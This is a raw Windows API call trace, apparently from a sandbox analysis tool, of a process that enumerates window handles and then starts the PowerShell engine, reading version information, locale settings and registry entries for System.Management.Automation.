	[0471.187] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xf94
	[0471.188] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xffc
	[0471.188] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xf74
	[0471.188] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xf08
	[0471.188] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xf0c
	[0471.188] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xed8
	[0471.188] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xe90
	[0471.188] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xea8
	[0471.188] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xfa8
	[0471.188] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xfbc
	[0471.188] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xfb8
	[0471.189] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xfb4
	[0471.189] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xfb0
	[0471.189] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xfac
	[0471.189] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xfc0
	[0471.189] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xfd0
	[0471.189] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xf88
	[0471.189] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xf84
	[0471.189] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xf80
	[0471.189] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xde0
	[0471.189] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xddc
	[0471.189] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xdd8
	[0471.190] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xd34
	[0471.190] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xd10
	[0471.190] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xd0c
	[0471.190] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xc9c
	[0471.190] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xc74
	[0471.190] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xc1c
	[0471.190] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xc08
	[0471.190] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xabc
	[0471.190] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x24c
	[0471.190] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xbb0
	[0471.191] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xbfc
	[0471.191] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xb10
	[0471.191] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x374
	[0471.191] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x368
	[0471.191] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xb28
	[0471.191] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xae8
	[0471.191] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xb14
	[0471.191] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x95c
	[0471.191] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xa8c
	[0471.191] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x46c
	[0471.191] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xb3c
	[0471.192] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xa90
	[0471.192] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xad0
	[0471.192] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xa9c
	[0471.192] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xaa0
	[0471.192] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xb1c
	[0471.192] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x7e0
	[0471.192] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xa74
	[0471.192] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x694
	[0471.192] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xa28
	[0471.192] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x9b0
	[0471.192] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x8d8
	[0471.193] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x940
	[0471.193] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x93c
	[0471.193] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4ec
	[0471.193] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x150
	[0471.193] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x720
	[0471.193] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x3c4
	[0471.193] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x7d4
	[0471.193] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x6c8
	[0471.193] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xb54
	[0471.193] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xb54
	[0471.194] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xb5c
	[0471.194] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x838
	[0471.194] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x818
	[0471.194] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x5b8
	[0471.194] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x494
	[0471.194] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1ec
	[0471.194] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x440
	[0471.194] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x7e8
	[0471.194] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x730
	[0471.194] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x2c8
	[0471.195] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x31c
	[0471.195] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x330
	[0471.195] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x128
	[0471.195] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x5c8
	[0471.195] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x6f8
	[0471.195] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x358
	[0471.195] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x73c
	[0471.195] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xb0
	[0471.195] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x250
	[0471.195] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x240
	[0471.195] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x790
	[0471.196] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x61c
	[0471.196] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x568
	[0471.196] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x538
	[0471.196] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x540
	[0471.196] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x460
	[0471.196] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x79c
	[0471.196] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4e0
	[0471.196] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x460
	[0471.196] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x778
	[0471.200] WerSetFlags () returned 0x0
	[0472.502] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0472.502] CoTaskMemFree (pv=0x0) 
	[0472.503] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xedaa8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xedaa0 | out: pulNumLanguages=0xedaa8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xedaa0) returned 1
	[0472.503] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xedaa8, pwszLanguagesBuffer=0x2c51030, pcchLanguagesBuffer=0xedaa0 | out: pulNumLanguages=0xedaa8, pwszLanguagesBuffer=0x2c51030, pcchLanguagesBuffer=0xedaa0) returned 1
	[0472.509] CoTaskMemAlloc (cb=0x24) returned 0x3189f0
	[0472.509] GetUserDefaultLocaleName (in: lpLocaleName=0x3189f0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0472.509] CoTaskMemFree (pv=0x3189f0) 
	[0472.542] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0472.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0472.542] CoTaskMemFree (pv=0x30a930) 
	[0473.844] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0473.844] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0473.844] CoTaskMemFree (pv=0x30a930) 
	[0473.846] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0473.846] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0473.846] CoTaskMemFree (pv=0x30a930) 
	[0473.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0473.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0473.856] SetErrorMode (uMode=0x1) returned 0x1
	[0473.856] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xed720 | out: lpFileInformation=0xed720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0473.856] SetErrorMode (uMode=0x1) returned 0x1
	[0473.856] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xed990 | out: lpdwHandle=0xed990) returned 0x94c
	[0473.857] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c548c0 | out: lpData=0x2c548c0) returned 1
	[0473.858] VerQueryValueW (in: pBlock=0x2c548c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xed908, puLen=0xed900 | out: lplpBuffer=0xed908*=0x2c5495c, puLen=0xed900) returned 1
	[0473.858] VerQueryValueW (in: pBlock=0x2c548c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xed878, puLen=0xed870 | out: lplpBuffer=0xed878*=0x2c54a38, puLen=0xed870) returned 1
	[0473.858] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0473.858] CoTaskMemAlloc (cb=0x2e) returned 0x322050
	[0473.858] lstrcpyW (in: lpString1=0x322050, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0473.858] CoTaskMemFree (pv=0x322050) 
	[0473.858] VerQueryValueW (in: pBlock=0x2c548c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xed878, puLen=0xed870 | out: lplpBuffer=0xed878*=0x2c54a8c, puLen=0xed870) returned 1
	[0473.859] lstrlenW (lpString="System.Management.Automation") returned 28
	[0473.859] CoTaskMemAlloc (cb=0x3c) returned 0x298fd0
	[0473.859] lstrcpyW (in: lpString1=0x298fd0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0473.859] CoTaskMemFree (pv=0x298fd0) 
	[0473.859] VerQueryValueW (in: pBlock=0x2c548c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xed878, puLen=0xed870 | out: lplpBuffer=0xed878*=0x2c54ae8, puLen=0xed870) returned 1
	[0473.859] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0473.859] CoTaskMemAlloc (cb=0x20) returned 0x323790
	[0473.859] lstrcpyW (in: lpString1=0x323790, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0473.859] CoTaskMemFree (pv=0x323790) 
	[0473.859] VerQueryValueW (in: pBlock=0x2c548c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xed878, puLen=0xed870 | out: lplpBuffer=0xed878*=0x2c54b28, puLen=0xed870) returned 1
	[0473.859] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0473.859] CoTaskMemAlloc (cb=0x44) returned 0x298fd0
	[0473.859] lstrcpyW (in: lpString1=0x298fd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0473.859] CoTaskMemFree (pv=0x298fd0) 
	[0473.859] VerQueryValueW (in: pBlock=0x2c548c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xed878, puLen=0xed870 | out: lplpBuffer=0xed878*=0x2c54b90, puLen=0xed870) returned 1
	[0473.859] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0473.859] CoTaskMemAlloc (cb=0x76) returned 0x2c1270
	[0473.859] lstrcpyW (in: lpString1=0x2c1270, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0473.859] CoTaskMemFree (pv=0x2c1270) 
	[0473.859] VerQueryValueW (in: pBlock=0x2c548c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xed878, puLen=0xed870 | out: lplpBuffer=0xed878*=0x2c54c2c, puLen=0xed870) returned 1
	[0473.859] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0473.859] CoTaskMemAlloc (cb=0x44) returned 0x298fd0
	[0473.859] lstrcpyW (in: lpString1=0x298fd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0473.859] CoTaskMemFree (pv=0x298fd0) 
	[0473.859] VerQueryValueW (in: pBlock=0x2c548c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xed878, puLen=0xed870 | out: lplpBuffer=0xed878*=0x2c54c90, puLen=0xed870) returned 1
	[0473.859] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0473.859] CoTaskMemAlloc (cb=0x58) returned 0x288b90
	[0473.859] lstrcpyW (in: lpString1=0x288b90, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0473.859] CoTaskMemFree (pv=0x288b90) 
	[0473.860] VerQueryValueW (in: pBlock=0x2c548c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xed878, puLen=0xed870 | out: lplpBuffer=0xed878*=0x2c54d0c, puLen=0xed870) returned 1
	[0473.860] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0473.860] CoTaskMemAlloc (cb=0x20) returned 0x323790
	[0473.860] lstrcpyW (in: lpString1=0x323790, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0473.860] CoTaskMemFree (pv=0x323790) 
	[0473.860] VerQueryValueW (in: pBlock=0x2c548c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xed878, puLen=0xed870 | out: lplpBuffer=0xed878*=0x2c549b4, puLen=0xed870) returned 1
	[0473.860] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0473.860] CoTaskMemAlloc (cb=0x66) returned 0x3229c0
	[0473.860] lstrcpyW (in: lpString1=0x3229c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0473.860] CoTaskMemFree (pv=0x3229c0) 
	[0473.860] VerQueryValueW (in: pBlock=0x2c548c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xed878, puLen=0xed870 | out: lplpBuffer=0xed878*=0x0, puLen=0xed870) returned 0
	[0473.860] VerQueryValueW (in: pBlock=0x2c548c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xed878, puLen=0xed870 | out: lplpBuffer=0xed878*=0x0, puLen=0xed870) returned 0
	[0473.860] VerQueryValueW (in: pBlock=0x2c548c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xed878, puLen=0xed870 | out: lplpBuffer=0xed878*=0x0, puLen=0xed870) returned 0
	[0473.860] VerQueryValueW (in: pBlock=0x2c548c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xed848, puLen=0xed840 | out: lplpBuffer=0xed848*=0x2c5495c, puLen=0xed840) returned 1
	[0473.860] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0473.860] VerLanguageNameW (in: wLang=0x0, szLang=0x2c9220, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0473.860] CoTaskMemFree (pv=0x2c9220) 
	[0473.860] VerQueryValueW (in: pBlock=0x2c548c0, lpSubBlock="\\", lplpBuffer=0xed898, puLen=0xed890 | out: lplpBuffer=0xed898*=0x2c548e8, puLen=0xed890) returned 1
	[0473.869] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0473.869] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0473.869] CoTaskMemFree (pv=0x30a930) 
	[0473.874] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0473.874] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0473.874] CoTaskMemFree (pv=0x30a930) 
	[0473.878] lstrlenW (lpString="䅁") returned 1
	[0474.815] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed768 | out: phkResult=0xed768*=0x2f4) returned 0x0
	[0474.816] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xed758 | out: phkResult=0xed758*=0x2f8) returned 0x0
	[0474.816] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed7e8 | out: phkResult=0xed7e8*=0x2fc) returned 0x0
	[0474.821] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed72c, lpData=0x0, lpcbData=0xed728*=0x0 | out: lpType=0xed72c*=0x1, lpData=0x0, lpcbData=0xed728*=0x56) returned 0x0
	[0474.822] CoTaskMemAlloc (cb=0x5a) returned 0x322950
	[0474.822] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed6fc, lpData=0x322950, lpcbData=0xed6f8*=0x56 | out: lpType=0xed6fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed6f8*=0x56) returned 0x0
	[0474.822] CoTaskMemFree (pv=0x322950) 
	[0474.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0474.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0474.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0475.976] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0475.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0475.977] CoTaskMemFree (pv=0x30a930) 
	[0479.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0479.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0482.235] CoTaskMemAlloc (cb=0x104) returned 0x30aa40
